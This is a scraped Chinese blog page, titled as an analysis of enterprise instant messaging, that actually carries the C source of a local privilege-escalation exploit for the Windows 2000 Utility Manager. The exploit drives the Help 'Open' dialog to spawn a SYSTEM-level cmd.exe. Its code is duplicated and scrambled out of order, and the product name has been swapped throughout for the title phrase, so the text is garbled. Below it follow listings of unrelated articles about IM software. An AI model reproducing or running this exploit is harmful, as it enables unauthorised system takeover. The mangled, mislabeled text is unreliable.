企业即使通讯方案分析

最新推荐文章于 2024-08-08 19:30:02 发布
最新推荐文章于 2024-08-08 19:30:02 发布
阅读量864 收藏
点赞数
文章标签: 通讯 null manager windows listview dialog
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mynote/article/details/2456928
版权

企业即使通讯方案分析

作者:未知 来源:未知 加入时间:2004-7-17 天新软件园

这个是源企业即使通讯方案:
//by Cesar Cerrudo sqlsec at ccc.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
//get navigation bar handle
//一定要是postmessageSleep(500);
// 得到文件打开对话框句柄lHandle = FindWindow("#32770","打开");
// 得到文件打开对话框中输入文件名编辑框的句柄,这个编辑框的ID为47clHandle2 = GetDlgItem(lHandle, 0x47C);Sleep(500);
//设置文件名编辑框的值为cmd.ex?SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);Sleep(800);
//输入回车,这样打开对话框的文件列表中就会显示.ex?文件,否则显示的
//是.hlp文件,因为默认只能打开后缀是.hlp的文件.
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
//得到打开对话框左边的企业即使通讯方案栏(就是历史,桌面,我的文档大图标)的句柄
//ToolbarWindow32这个控件类名为lHandle2 = GetDlgItem(lHandle, 0x4A0);
//发送tab消息,这样焦点就在右边的文件列表控件中了.SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);Sleep(500);//得到打开对话框的子控件文件列表控件的句柄lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);//得到列表控件的子控件syslistview32的句柄,控件id为1lHandle2 = GetDlgItem(lHandle2, 0x1);SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
// send "c" charSendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
// send "m" charSendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
// send "d" char
//发送cmd这样是为了把焦点准确的落在cmd.exe上
//奇怪的是手工一个一个的输入cmd则不行哟Sleep(800);
// 打开右键菜单PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);Sleep(1000);
//通过当前的光标位置来得到右键菜单句柄point.x =10; point.y =30;lHandle2=WindowFromPoint(point);SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
// 在右键菜单中下移一个选项SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
// 在右键菜单中下移一个选项这时落在打开上SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
// 发送回车SendMessage (lHandle, WM_CLOSE,0,0);
//关闭文件打开对话框return(0);}在单机运行此程序,以上的操作是隐藏性的,过程只有几秒钟时间至于
它的利用条件~在进一步的参考
//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);
SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0);// close open error window
SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0);// close utility manager
return 0;
}
本人根据以上企业即使通讯方案编译了一个小企业即使通讯方案, 由于不是十分完善, 暂时不发布
只将UtilMan.exe的简单分析做了个说明:
UtilMan.exe的新漏洞简单分析该漏洞在2k+sp4下测试成功.
大概意思是:
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of priviliges exploit for Windows Utility Manager得到一个系统权限的
shellchar sText[]="%windir%//system32//cmd.ex?";
//不是.exe
// 运行企业即使通讯方案管理器
//WinExec ("utilman.exe /start",SW_SHOW);
//Sleep(500);
// 打开帮助,这时执行了winhlp32.exe,4d号消息是未公开的相当于按下F1吧
SendMessage(FindWindow(NULL, "企业即使通讯方案管理器"), 0x4D, 0, 0);Sleep(500);
// 打开文件打开对话框,winhlp32.exe中44d为菜单栏打开选项的
IDPostMessage(FindWindow(NULL, "Windows 帮助"), WM_COMMAND, 0x44D, 0);
#include "stdio.h"
#include "windows.h"

lHandle2 = GetDlgItem(lHandle, 0x4A0);
W2kUtilManExp
//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%//system32//cmd.ex?";

// run utility manager
// system("utilman.exe /start");
// Sleep(500);

lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("/nUsage :/nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe/n");
return 0;
}

PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button in the taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1); //send WM_COMMANDHELP 0x0365 lParam must be <>NULL
Sleep(300);

SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN,
VK_RETURN, 0);
Sleep(500);

// find open file dialog window
lHandle = FindWindow("#32770","Open");

// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
W2kUtilManExp企业即使通讯方案程序企业即使通讯方案及企业即使通讯方案分析
作者:未知 来源:未知 加入时间:2004-7-17 天新软件园

阳阳2013哈哈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解读企业即时通讯
skype1688的博客
07-13 1821
企业即时通信,简称EIM(Enterprise Instant Messaging),它是一种面向企业终端使用者的网络沟通工具服务,使用者可以通过安装了即时通信的终端机进行两人或多人之间的实时沟通。交流内容包括文字、界面、语音、视频及文件互发等。 一、市场分析 1、 市场规模 根据调研机构调查数据显示,截止到2015年底,企业即时通讯市场规模达到10个亿美元左右。其中,中国企业即时通
2012最新企业即时通讯软件系统14大行业解决方案
03-02
### 企业即时通讯软件系统与2012年14大行业解决方案 #### 政府与事业单位行业解决方案 **背景与现状分析** 在全球化与行政国际化的推动下,政府职能正经历重大转变,旨在更好地服务于企业、家庭和个人,以及促进...
企业实时通信解决方案
weixin_34311757的博客
12-11 258
企业实时通信,也叫企业即时通讯。它是一种面向企业终端使用者的网络沟通工具服务,使用者可以通过安装了即时通信的终端机与企业内部的两人或多人之间实现实时沟通。交流内容包括文字、界面、语音、视频及文件互发等。 概要 企业实时通信的核心就是沟通, 信息化高速发展的今天,每个企业都需准确、高效的资源整合及信息决策的汇集与分析。应用信息化手段来提升企业价值。以信息...
企业OA即时通讯系统解决方案
ama7449的博客
12-24 575
企业OA即时通讯系统解决方案 一、部署企业即时通讯系统的意义--企业信息化建设 美国市场咨询公司Radicati Group日前公布了关于面向企业的即时通讯市场的调查结果,结果显示,北美85%的企业在业务及个人交流中使用即时通讯,全球该比率达20%。Radicati预测,到2008年底全球80%的企业将使用即时通讯。 随着IT技术的高速发展,面对新的经济形势,国内大、中、小...
IM即时通讯-3-如何设计消息协议层方案
潘永强_PandaPan的博客
02-02 1万+
及时通讯系统如何设计协议层, 端到端的协议层如何设计, 端内的协议层如何设计
IM即时通讯-5-衡量指标有哪些
潘永强_PandaPan的博客
03-25 677
即时通讯系统有那些衡量指标呢? 本文从端到端, 以及客户端的维度做总结和分析, 并且以有趣的故事,说明衡量指标的重要性。
IM即时通讯-N-如何保证消息的可靠性展示
热门推荐
潘永强_PandaPan的博客
03-10 1万+
可靠性展示,指的是在用户查看消息时, 展示给用户的消息是不丢失的,不重复的, 并且是有序最新的的。即有序+不丢+不重+最新以下我们从简单到复杂, 逐步设计出推拉结合的模式下会话消息的可靠性展示。原则: server拉取的消息一定是连续的原则: 端侧记录的消息的连续段有两个作用: 1. 记录消息的连续性, 即起始中间没有断层, 2. 消息连续, 同时意味着消息是最新的,消息不是过期的。
企业即时通讯软件Cnskype for Business
skype1688的博客
06-12 609
Cnskype是基于Skype for Business推出的增强型融合通讯解决方案,是一款让Skype for Business满足中国企业需求,体验上更加贴近中国客户的使用习惯,Cnskype中的功能有安全移动办公解决方案,该方案融合了Skype forBusiness在智能终端、应用软件、系统网络以及云计算等通讯领域多方面的核心优势,为企业和用户提供全新的移动办公解决方案
局域网内即时通讯软件监控?推荐5款适合企业IM即时通讯工具
Dcymit的博客
07-06 386
在信息化高速发展的今天,企业内部即时通讯(IM)软件已成为提升企业沟通效率、促进团队协作的重要工具。它们不仅提供了传统的文字聊天功能,还集成了音视频会议、文件共享、任务协同等多种功能,极大地丰富了企业的沟通方式。
Spring Boot + WebSocket 实现 IM 即时通讯
学IT,找陈寒
06-23 1042
通过Spring Boot和WebSocket,可以快速构建一个高效的即时通讯系统。本文介绍了基本的配置和实现流程,并提供了一个简单的示例。即时通讯(IM)已经成为现代应用中不可或缺的一部分,从社交媒体到企业协作工具,无不依赖于IM技术来实现实时消息传递。首先,我们需要创建一个Spring Boot项目,并添加WebSocket的相关依赖。打开多个浏览器窗口或标签页,可以在它们之间发送消息,验证即时通讯功能是否正常工作。接下来,我们需要创建一个控制器来处理WebSocket消息。
探索高效即时通讯解决方案:Smack 开源库
gitblog_00075的博客
05-12 327
探索高效即时通讯解决方案:Smack 开源库 项目地址:https://gitcode.com/igniterealtime/Smack 1、项目介绍 Smack 是一个高度模块化、易用的 Java 和 Android 开源库,用于实现 XMPP(Extensible Messaging and Presence Protocol)客户端功能。它不仅可用于构建完整的即时通讯应用,还可以轻松集成到您...
企业即时通讯
12-01
在ORACLE_qq项目打包中,我们可以推断这可能是一个基于Oracle技术的企业即时通讯解决方案。Oracle是全球知名的数据库和技术提供商,其产品涵盖了数据库管理、中间件、云服务等多个领域。将即时通讯与Oracle技术结合...
Android平台下的即时通讯客户端实现方案
04-25
为解决在基于Linux操作系统的...并使用Eclipse加上Android集成开发环境插件为手段,对客户端架构、应用模块框架、数据存储、主要功能和核心模块开发技术等全方面分析,从而提供了实现即时通信系统的客户端解决方案
风车im即时通讯解决方案
10-29
通过以上分析,我们可以看出风车IM是一个强大且全面的即时通讯工具,它不仅注重隐私和安全性,还具备良好的可扩展性和多平台支持,适合企业或开发者构建定制化的社交或办公应用。无论是个人还是团队,都可以根据自身...
喧喧 开源免费企业即时通讯软件 v2.4 源码包
10-04
喧喧是一款专为企事业单位...总之,喧喧作为一个开源的即时通讯解决方案,不仅为企业提供了实用的沟通工具,也为开发者提供了丰富的学习资源。无论是用于实际部署还是技术研究,喧喧都是一款值得深入探讨的优秀软件。
美股文本信息抽取
cts618
08-07 322
美股文本信息抽取
python
最新发布
m0_70848838的博客
08-08 382
Dict([(k0,v0),(k1,v0),(k2,v2)]) []中的每个()中都有2个值,⼀个是key,⼀个是value⾃动 解析为⼀个字典了。元组 (),(1,2,3,4) 创建空元组,创建有初始值的元组。字典.values() 字典中的value组成的列表。
Python3的安装及基础指令
m0_74614835的博客
08-08 457
>> dic={'name': 'huajuan', 'age': '21', 'gender': ' 女' 'phone': '1888'}{'name': 'huajuan', 'age': '21', 'gender': '女', 'phone': '1888'}>>> d={'id': 1001, 'name': '花卷', 'age': 21, 'gender': '女'}>>> lista=['李四', '张三', '王五']字典中的每个k-v组成元组,这些元组组成一个新的列表。
Linux学习笔记:Linux基础知识汇总(个人复习版)
欢迎相互探讨交流知识呀~
08-05 1943
使用fdisk -l查看分区挂载情况,或者查看/etc/mtab文件,然后找到最接近的挂载点信息。4、创建站点主页 【eg.在/var/www/html内新建index.html】write_enable=YES//ftp可写,即上传权限;下载权限是默认赋予的。将数据同步写入硬盘中的指令,在关机之前输入,可以多输几次。使用df命令,如df -h,查看磁盘分区的挂载点。使用lsblk命令,查看系统的磁盘设备使用情况。-a:显示所有文件(包括隐藏文件),简洁版。-R:显示所有文件以及子目录下文件,简洁版。
2010手机即时通讯软件竞品分析:QQ、MSN与Fetion
"本文主要对2010年手机终端主流即时通讯软件进行竞品分析,涉及QQ、Fetion(飞信)和MSN等产品,分析内容包括战略定位、盈利模式、产品功能和界面设计等方面。" 即时通讯软件在2010年的市场竞争激烈,其中腾讯QQ以其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值